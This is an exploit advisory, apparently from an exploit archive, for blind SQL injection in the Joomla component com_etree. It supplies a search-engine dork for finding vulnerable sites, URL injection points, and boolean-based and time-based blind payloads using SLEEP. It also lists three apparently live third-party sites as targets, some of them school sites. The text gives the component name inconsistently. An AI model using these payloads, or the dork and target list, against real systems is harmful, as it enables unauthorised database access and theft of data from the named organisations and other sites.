# Exploit Title: Joomla com_etree Blind SQL-inj Vuln # Date: 20.02.2012 # Author: Mach1ne # Version: 1.5.+ # Category:: [remote, webapps] # Google dork: inurl:com_personal # Tested in: web ============================== ================================= Multiple SQL-inj parametrs in Joomla com_personal: http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=category&id=[SQL] =============================================================== http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=category&id=6'+and+2=2 http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=category&id=7'+and+2=2 http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_id=5'+and+2=2 GET parameter 'user_id' is vulnerable. --- Place: GET Parameter: user_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_etree&view=displays&layout=user&user_id=5' AND 425=425 AND 'PbgE'='PbgE Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: option=com_etree&view=displays&layout=user&user_id=5' AND SLEEP(5) AND 'bLot'='bLot =============================================================== Greetz to : forum.antichat.ru and all Russian hackers ===============================================================